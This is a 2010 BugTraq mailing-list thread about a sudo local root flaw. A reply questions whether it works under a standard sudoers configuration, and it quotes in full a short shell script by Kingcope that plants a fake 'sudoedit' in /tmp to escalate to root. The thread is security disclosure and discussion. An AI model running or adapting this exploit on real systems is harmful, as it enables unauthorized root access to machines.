BugTraq
Todd Miller Sudo local root exploit discovered by Slouching Mar 01 2010 11:08PM
Kingcope (kcope2 googlemail com) (1 replies)
Re: Todd Miller Sudo local root exploit discovered by Slouching Mar 03 2010 12:03PM
andy hotmail com (2 replies)
Hi Kingcope,

....but if the 'sudoers' file is correctly configured then you would not
have the appropriate sudo permission to run the 'sudoedit' as root.

....of course I'm assuming that the 'sudoers' file has not got the 'run
any command' in it.

If the sudoers file used is even the default then I would think you would
get some error on the lines of:

'Sorry, user is not allowed to execute './sudoedit test' as root on this
machine'.

Aren't you assuming the the sudoers file has a line in it that allows the
user in question to run the /home/myhome/sudoedit as sudo???

Or am I missing something?

Andy

On Tue, 2 Mar 2010, Kingcope wrote:

> Just for the record.
>
> ---snip---
> #!/bin/sh
> # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
> # local root exploit
> # March 2010
> # automated by kingcope
> # Full Credits to Slouching
> echo Tod Miller Sudo local root exploit
> echo by Slouching
> echo automated by kingcope
> if [ $# != 1 ]
> then
> echo "usage: ./sudoxpl.sh <file you have permission to edit>"
> exit
> fi
> cd /tmp
> cat > sudoedit << _EOF
> #!/bin/sh
> echo ALEX-ALEX
> su
> /bin/su
> /usr/bin/su
> _EOF
> chmod a+x ./sudoedit
> sudo ./sudoedit $1
> --snip---
>
> cheers,
> kingcope
>

[ reply ]
Re: Todd Miller Sudo local root exploit discovered by Slouching Mar 03 2010 07:13PM
Jann Horn (jannhorn googlemail com)
Re: Todd Miller Sudo local root exploit discovered by Slouching Mar 03 2010 01:18PM
Kingcope (kcope2 googlemail com)


 

Privacy Statement
Copyright 2010, SecurityFocus